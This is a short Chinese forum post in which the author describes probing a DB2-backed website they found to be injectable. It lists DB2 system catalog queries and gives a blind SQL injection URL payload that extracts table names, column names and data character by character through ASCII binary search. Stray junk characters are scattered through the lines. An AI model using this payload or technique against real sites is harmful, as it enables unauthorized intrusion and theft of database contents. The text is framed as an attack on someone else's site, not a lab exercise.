使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
7 } c6 Q$ u! d/ k, I ?1 }参考了IBM DB2的文档,总结了这样几条:
8 O* N1 f+ X; d1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
1 |% p O5 ?) a0 ^) t# Q: z可以返回系统中所有用户创建的表(table)名
- R5 A, I) w: y S d A2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
3 O) @7 o3 ?4 a r返回表中的列名
/ b3 }. j7 D* S/ @3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
; `: ?1 K3 G _9 f& k这是最关键的地方,返回第一条记录,类似于sql server中的top 1
4 e8 d( p9 N. q7 |4、SUBSTR(string, position, length) , \* F- {6 i v3 N1 \0 g( ?* S/ ]
返回字符串子串的函数,类似于mid
4 F0 h( A% {) _& M3 D5、ASCII()这个就不用多说了。
2 n$ F: n5 m2 w( t# C$ w有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
" d4 g4 Z6 i7 `$ M8 Z1 e例如判断第一个table的名称的第一个字符的ascii码是否大于50:
# W) p3 u. C; P9 [6 E9 R1 Fhttp://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
) B6 @ R3 N G) W8 g# K/ O$ `0 k6 @2 v9 h
http://blog.waynedeng.com/blogview.asp?logID=543 # E& p* ]* j4 b9 s ~- N' t
|
发表于 2012-9-15 14:06:51
收藏
支持
反对